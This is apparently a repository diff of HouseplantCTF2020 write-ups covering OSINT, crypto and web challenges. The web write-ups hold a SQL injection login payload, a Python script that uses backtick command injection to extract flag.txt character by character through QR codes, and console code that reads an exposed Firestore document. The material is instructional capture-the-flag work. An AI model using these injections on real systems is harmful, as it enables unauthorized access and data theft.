houseplant

Author: joshdabosh

.DS_Store

@@ -0,0 +1,19 @@
+# Catography
+Osint
+
+> Jubie's released her own collection of cat pictures. Go check it out!
+> 
+> http://challs.houseplant.riceteacatpanda.wtf:30002
+> 
+> Note: The Unsplash author credit is not a part of the challenge, it's only there to conform with the Unsplash image license.
+
+Originally I tried to exploit the `/api?page=<n>` route, but that turned out to be useless.
+
+We get the spidey sense that we should check EXIF data again (for some reason) and so we find that we have GPS coordinates in each image. Moreover, the coordinates were mostly distinct.
+
+
+I recognized this as similar to the last stage of a [HackTM 2020 challenge](https://github.com/joshdabosh/writeups/tree/master/HackTM2020) that I solved, so I tried applying the same idea: plotting the points on some surface.
+
+I told my teammate how to do it and he solved :p
+
+Apparently the flag overlapped with itself so he had to do it letter by letter. :confetti_ball: 

HouseplantCTF2020/OSINT/Catography.md

@@ -0,0 +1,27 @@
+# Groovin-and-Cubin
+Osint
+
+> I really like my work, I get to make cool cryptography CTF challenges but with Rubik's cubes! Sadly, they aren't good enough to get released, but hey, I took a nice image of my work! You should go try to find some more about my work :)
+> 
+> Attached: vibin.zip
+
+Extracting the zip gives us an image. Something inside our soul tells us to check EXIF data, so we do:
+
+```
+exiftool vibin.jpg 
+ExifTool Version Number         : 10.94
+File Name                       : vibin.jpg
+Directory                       : .
+File Size                       : 2.4 MB
+...
+Comment                         : A long day of doing cube crypto at work... but working at Groobi Doobie Shoobie Corp is super fun!
+...
+```
+
+The comment leads us to look for a store named `Groobi Doobie Shoobie Corp`.
+
+We find [their Twitter](https://twitter.com/GShoobie) eventually.
+
+Scrolling to their first tweet reveals that they have an [Instagram account](https://www.instagram.com/groovyshoobie/) too. The flag is in the bio.
+
+Flag: `rtcp{eXiF_c0Mm3nT5_4r3nT_n3cEss4rY}`

HouseplantCTF2020/OSINT/Groovin-and-Cubin.md

@@ -0,0 +1,20 @@
+
+# HouseplantCTF2020
+
+## Overview
+
+I "played" with RGBSec, and they got 5th with max score. 
+
+The reason I said "played" was because I barely spent any time on this CTF and instead played another CTF with DiceGang.
+
+Here are some writeups.
+
+# Challenges
+| Challenge Name | Category |
+|:-:|:-:|
+|[Fire/place](web/Fire-place.md)|web|
+|[QR Generator](web/QR-Generator.md)|web|
+|[I don't like needles](web/I-don't-like-needles.md)|web|
+|[Catography](OSINT/Catography.md)|OSINT|
+|[Groovin and Cubin](OSINT/Groovin-and-Cubin.md)|OSINT|
+|[Rainbow Vomit](crypto/Rainbow-Vomit.md)|crypto|

HouseplantCTF2020/README.md

@@ -0,0 +1,27 @@
+{
+	"index": {
+		"notes": ["overview"]
+	},
+	"categories": ["web", "OSINT", "crypto"],
+	"columns": ["category"],
+	"challenges": {
+		"I don't like needles": {
+			"category": "web"
+		},
+		"QR Generator": {
+			"category": "web"
+		},
+		"Fire/place": {
+			"category": "web"
+		},
+		"Groovin and Cubin": {
+			"category": "OSINT"
+		},
+		"Catography": {
+			"category": "OSINT"
+		},
+		"Rainbow Vomit": {
+			"category": "crypto"
+		}
+	}
+}

HouseplantCTF2020/config.json

@@ -0,0 +1,12 @@
+# Rainbow-Vomit
+Crypto
+
+> o.O What did YOU eat for lunch?!
+> 
+> The flag is case insensitive.
+> 
+> Attached: output.png
+
+Straight [hexahue](https://www.geocachingtoolbox.com/index.php?lang=en&page=hexahue) decoding.
+
+I got sniped by someone else while I was writing a script though.

HouseplantCTF2020/crypto/Rainbow-Vomit.md

@@ -0,0 +1,29 @@
+# Fire-place
+Web
+
+> You see, I built a nice fire/place for us to all huddle around. It's completely decentralized, and we can all share stuff in it for fun!!
+> Hint! I wonder... what's inside the HTML page?
+
+Inspecting the source of the HTML doc reveals that this uses Google FireBase's FireStore.
+
+We can get a DB reference to the `data` collection by typing the following in the console:
+
+```javascript
+var x = await db.collection("board").doc("data").get()
+console.log(x.data())
+```
+
+(`.get()` returns a Promise so we have to await it)
+
+After a few more minutes of poking around I told a teammate and left.
+
+The solution was to guess that there was another document named `flag` and retrieve that:
+
+```javascript
+var x = await db.collection("board").doc("flag").get()
+console.log(x.data())
+```
+
+angery :(
+
+Flag: `rtcp{d0n't_g1ve_us3rs_db_a((3ss}`

HouseplantCTF2020/web/Fire-place.md

@@ -0,0 +1,14 @@
+# I-don't-like-needles
+Web
+
+> They make me SQueaL!
+> 
+> http://challs.houseplant.riceteacatpanda.wtf:30001
+
+We get source by visiting `/?sauce`.
+
+This is vulnerable to classic SQLi, but we have to actually read the source to find the right username: `flagman69`.
+
+We log in with username `flagman69` and password `'=0;-- ` to get the flag.
+
+Flag: `rtcp{y0u-kn0w-1-didn't-mean-it-like-th@t}`

HouseplantCTF2020/web/I-don't-like-needles.md

@@ -0,0 +1,42 @@
+# QR-Generator
+Web
+
+> I was playing around with some stuff on my computer and found out that you can generate QR codes! I tried to make an online QR code generator, but it seems that's not working like it should be. Would you mind taking a look?
+>
+> http://challs.houseplant.riceteacatpanda.wtf:30004
+> 
+> Hint! For some reason, my website isn't too fond of backticks...
+
+The backticks seem to indicate the typical bash injection.
+
+The endpoint where the actual QR code is processed is at `/qr?text=<text>`.
+
+Scanning some sample QR codes reveals that it only encodes the first letter of whatever is encoded. On errors, it redirects to `/error.jpg`.
+
+We can try injecting ``/qr?text=`ls` `` (the extra space isn't necessary, markdown just doesn't like literal backticks). Scanning the generated QR code gives us an `R`.
+
+To get the full character, we can iterate through characters of the stdout of the command: `<cmd> | head -c n | tail -c 1` where n is the n'th character of stdout.
+
+We can use this trick with `ls` to get the directory listing. We find that there is a `flag.txt`. The following script extracts the contents of `flag.txt`.
+
+```python
+from pyzbar.pyzbar import decode
+from PIL import Image
+
+import urllib.request
+
+
+url = "http://challs.houseplant.riceteacatpanda.wtf:30004/qr?text=`cat%20flag.txt|%20head%20-c%20{}%20|%20tail%20-c%201`"
+
+i = 1
+
+while True:
+    temp = url.format(i)
+    urllib.request.urlretrieve(temp, "qr.jpg")
+
+    print(decode(Image.open("qr.jpg"))[0].data.decode(), end="")
+
+    i+=1
+```
+
+Flag: `rtcp{fl4gz_1n_qr_c0d3s???_b1c3fea}`

HouseplantCTF2020/web/QR-Generator.md

@@ -7,7 +7,6 @@
 
 try:
     overwrite = int(sys.argv[2])
-    assert overwrite == 1
 
 except:
     overwrite = 0
@@ -76,7 +75,7 @@
     for chall in challs:
         for col in columns:
             if col == "Challenge Name":
-                toAdd += f"|[{chall}]({cat+'/'+chall.replace(' ', '-')+'.md'})"
+                toAdd += f"|[{chall}]({cat+'/'+chall.replace(' ', '-').replace('/', '-')+'.md'})"
                 continue
 
             toAdd += "|" + challenges[chall][col.lower()]
@@ -87,13 +86,17 @@
 
 
 for chall, amt in challenges.items():
-    chall = chall.replace(" ", "-")
+    chall = chall.replace(" ", "-").replace("/", "-")
     fname = os.path.join(name, amt['category'].lower(), chall+".md")
 
-    if overwrite:
+    if overwrite == 1:
         with open(fname, "w") as f:
             f.write(f"# {chall}\n{amt['category'].capitalize()}, {amt['points']}")
 
+    if overwrite == 2:
+        with open(fname, "w") as f:
+            f.write(f"# {chall}\n{amt['category'].capitalize()}")
+            
     else:
         if not os.path.exists(fname):
             with open(fname, "w") as f: